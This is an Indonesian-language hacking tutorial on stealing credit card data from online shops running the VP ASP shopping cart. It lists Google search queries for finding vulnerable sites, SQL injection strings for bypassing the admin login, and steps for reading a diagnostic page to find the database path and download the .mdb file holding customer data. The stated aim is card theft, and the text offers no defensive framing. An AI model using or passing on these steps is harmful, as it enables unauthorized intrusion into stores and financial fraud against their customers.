Memanen Data Kartu Kredit dari VP ASP Shopping Card

Mencari Target Dengan Google Hacking

Ketik cobalah salah satu kata kunci berikut pada mesin pencari Google:

  • allinurl:shopadmin.asp
  • allinurl:vp-asp

SQL Injection

Misalnya target Anda dari hasil pencarian Google adalah:

http://www.spyrozone.net/shopadmin.asp

Cobalah mengakses halaman tersebut. Anda akan diminta untuk memasukkan username dan password. Cobalah kedua account berikut:

  • Username: ‘or”=’
    Password: ‘or”=’
  • Username: admin
    Password: ‘or”=’

Jika berhasil, Anda kini memiliki kontrl penuh terhadap CMS ;)

Download Database

Sekarang, kita akan memanfaatkan celah keamanan lain untuk mendapatkan informasi-informasi sensitif. Cobalah mengakses shopdbtest.asp. Karen atadi targetnya http://www.spyrozone.net, maka ketik pada URL:

http://www.spyrozone.net/shopdbtest.asp

Akan tampil variabel-variabel sensitif. Anda cukup memperhaikan 2 variabel yang paling menarik, yaitu:

  • xDatabase
  • xDblocation

Misalnya nilai pada:

  • xDatabase = spyrodatabase
  • xDblocation = spyrokid

maka file databasenya terletak pada folder /spyro/ dengan nama spyrodatabase.mdb. Untuk mendownloadnya, ketik URL:

http://www.spyrozone.net/spyro/spyrodatabase.mdb

Bukalah file spyrodatabase.mdb dengan Microsoft Access untuk melihat isi databasenya.

Sekian, semoga bermanfaat

Iklan